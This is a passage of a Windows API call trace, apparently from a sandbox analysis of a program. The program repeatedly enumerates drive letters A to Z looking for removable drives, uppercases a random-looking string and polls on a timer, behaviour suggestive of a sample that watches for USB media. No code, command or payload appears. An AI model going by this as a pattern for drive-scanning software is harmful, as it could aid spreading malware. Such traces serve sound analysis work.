(lpRootPathName="g:\\") returned 0x1 [0216.852] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.852] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.853] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.853] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.853] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.853] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.854] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.854] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.854] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.854] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.855] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.855] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.855] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.855] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.855] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.856] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.856] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.856] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.856] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.856] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.857] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0216.857] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0216.857] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0216.858] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0216.858] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.858] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.858] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.858] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.858] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.858] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.859] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.859] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.859] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.859] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.859] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.860] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.860] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.860] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.860] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.860] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.861] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.861] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.861] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.861] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.861] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.861] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.862] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.862] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.862] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.862] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.862] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.862] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.863] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.863] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.863] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.863] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.863] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.863] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.864] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.864] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0216.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.864] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.865] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.865] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.865] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.865] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0216.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.865] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0216.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0216.866] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0216.866] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.866] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.866] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0216.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.866] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.866] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.866] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.866] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.867] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.867] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.867] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.867] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.867] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.868] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.868] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.868] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.868] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.868] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.868] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.869] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.869] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.869] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.870] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.870] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.870] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.870] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.870] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.871] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.871] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.871] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.871] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.871] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.872] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.872] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.872] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.872] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.872] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0216.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.873] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.909] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0216.909] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.909] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.909] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0216.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.910] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.910] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0216.910] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.910] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.910] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.910] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.910] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.911] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0216.911] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.911] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.911] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.911] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.911] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.911] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0216.911] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.911] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.912] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.912] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.912] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, 